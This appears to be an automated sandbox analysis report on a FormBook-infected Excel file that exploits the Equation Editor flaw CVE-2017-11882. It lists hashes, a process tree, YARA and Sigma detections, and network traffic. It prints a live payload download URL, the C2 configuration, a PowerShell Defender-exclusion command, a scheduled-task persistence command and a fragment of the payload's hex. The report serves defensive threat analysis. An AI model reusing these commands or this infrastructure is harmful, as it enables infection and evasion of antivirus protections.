Loading ...

Play interactive tourEdit tour

Windows Analysis Report Payment Details.xlsx

Overview

General Information

Sample Name:Payment Details.xlsx
Analysis ID:528790
MD5:f49e322b837835ac60cad8c173ecff31
SHA1:c7cddfbf865b528d1bbbbe5c5f3974279cc8b6f5
SHA256:ff4e17d62ce9c71164879418e7942cecf8db37b16cb66adebc6c2570840f8524
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Suspicius Add Task From User AppData Temp
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Defender Exclusion
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Drops PE files to the user root directory
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1268 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3028 cmdline: "C:\Users\Public\vbc.exe" MD5: 0F88779E9500075DE85E916637305164)
      • powershell.exe (PID: 2728 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 2636 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 1724 cmdline: C:\Users\Public\vbc.exe MD5: 0F88779E9500075DE85E916637305164)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 1292 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 2964 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.blancheshelley.xyz/g2fg/"], "decoy": ["snowcrash.website", "pointman.us", "newheartvalve.care", "drandl.com", "sandspringsramblers.com", "programagubernamental.online", "boja.us", "mvrsnike.com", "mentallyillmotherhood.com", "facom.us", "programagubernamental.store", "izivente.com", "roller-v.fr", "amazonbioactives.com", "metaverseapple.xyz", "5gt-mobilevsverizon.com", "gtwebsolutions.co", "scottdunn.life", "usdp.trade", "pikmin.run", "cardano-dogs.com", "bf2hgfy.xyz", "teslafoot.com", "rubertquintana.com", "wellsfargroewards.com", "santel.us", "couponatonline.com", "theunitedhomeland.com", "pmstnly.com", "strlocal.com", "shelleysmucker.com", "youser.online", "emansdesign.com", "usnikeshoesbot.top", "starfish.press", "scotwork.us", "metamorgana.com", "onyxbx.net", "rivas.company", "firstcoastalfb.com", "onpurposetraumainformedcare.com", "celimot.xyz", "jecunikepemej.rest", "lenovolatenightit.com", "unitedsterlingcompanyky.com", "safety2venture.us", "facebookismetanow.com", "scottdunn.review", "mentallyillmotherhood.com", "firstincargo.com", "vikavivi.com", "investmenofpairs.club", "nexans.cloud", "farcloud.fr", "ivermectinforhumans.quest", "5gmalesdf.sbs", "majenta.info", "6vvvvvwmetam.top", "metafirstclass.com", "firstcoinnews.com", "btcetffutures.online", "funinfortmyers.com", "mangoirslk.top", "metaversebasicprivacy.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x993a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.0.vbc.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.0.vbc.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.0.vbc.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18859:$sqlite3step: 68 34 1C 7B E1
        • 0x1896c:$sqlite3step: 68 34 1C 7B E1
        • 0x18888:$sqlite3text: 68 38 2A 90 C5
        • 0x189ad:$sqlite3text: 68 38 2A 90 C5
        • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
        9.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 202.55.132.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1268, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1268, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1268, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 3028
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1292
          Sigma detected: Suspicius Add Task From User AppData TempShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, ProcessId: 2636
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1268, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 3028
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, ProcessId: 2728
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1292
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, ProcessId: 2728

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.blancheshelley.xyz/g2fg/"], "decoy": ["snowcrash.website", "pointman.us", "newheartvalve.care", "drandl.com", "sandspringsramblers.com", "programagubernamental.online", "boja.us", "mvrsnike.com", "mentallyillmotherhood.com", "facom.us", "programagubernamental.store", "izivente.com", "roller-v.fr", "amazonbioactives.com", "metaverseapple.xyz", "5gt-mobilevsverizon.com", "gtwebsolutions.co", "scottdunn.life", "usdp.trade", "pikmin.run", "cardano-dogs.com", "bf2hgfy.xyz", "teslafoot.com", "rubertquintana.com", "wellsfargroewards.com", "santel.us", "couponatonline.com", "theunitedhomeland.com", "pmstnly.com", "strlocal.com", "shelleysmucker.com", "youser.online", "emansdesign.com", "usnikeshoesbot.top", "starfish.press", "scotwork.us", "metamorgana.com", "onyxbx.net", "rivas.company", "firstcoastalfb.com", "onpurposetraumainformedcare.com", "celimot.xyz", "jecunikepemej.rest", "lenovolatenightit.com", "unitedsterlingcompanyky.com", "safety2venture.us", "facebookismetanow.com", "scottdunn.review", "mentallyillmotherhood.com", "firstincargo.com", "vikavivi.com", "investmenofpairs.club", "nexans.cloud", "farcloud.fr", "ivermectinforhumans.quest", "5gmalesdf.sbs", "majenta.info", "6vvvvvwmetam.top", "metafirstclass.com", "firstcoinnews.com", "btcetffutures.online", "funinfortmyers.com", "mangoirslk.top", "metaversebasicprivacy.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment Details.xlsxVirustotal: Detection: 36%Perma Link
          Source: Payment Details.xlsxReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://202.55.132.154/384500000_1/vbc.exeAvira URL Cloud: Label: malware
          Source: www.blancheshelley.xyz/g2fg/Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://202.55.132.154/384500000_1/vbc.exeVirustotal: Detection: 12%Perma Link
          Source: www.blancheshelley.xyz/g2fg/Virustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 50%
          Source: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exeReversingLabs: Detection: 50%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 50%
          Source: 9.2.vbc.exe.706380.3.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 9.2.vbc.exe.30000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 9.0.vbc.exe.400000.10.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.vbc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.vbc.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: global trafficDNS query: name: www.metafirstclass.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 202.55.132.154:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 202.55.132.154:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exeDomain query: www.metafirstclass.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.blancheshelley.xyz/g2fg/
          Source: Joe Sandbox ViewASN Name: DOSARRESTUS DOSARRESTUS
          Source: Joe Sandbox ViewASN Name: ADTEC-AS-VNADTECMediaJointStockCompanyVN ADTEC-AS-VNADTECMediaJointStockCompanyVN
          Source: global trafficHTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1Host: www.metafirstclass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.128.23.153 52.128.23.153
          Source: Joe Sandbox ViewIP Address: 202.55.132.154 202.55.132.154
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:29:20 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Thu, 25 Nov 2021 04:42:24 GMTETag: "b0a00-5d19599d2da5b"Accept-Ranges: bytesContent-Length: 723456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 14 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 0a 00 00 0a 00 00 00 00 00 00 7e 1d 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 1d 0b 00 4f 00 00 00 00 20 0b 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc fd 0a 00 00 20 00 00 00 fe 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 20 0b 00 00 08 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 08 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1d 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b0 21 01 00 03 00 00 00 8c 01 00 06 5c 6a 02 00 d0 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 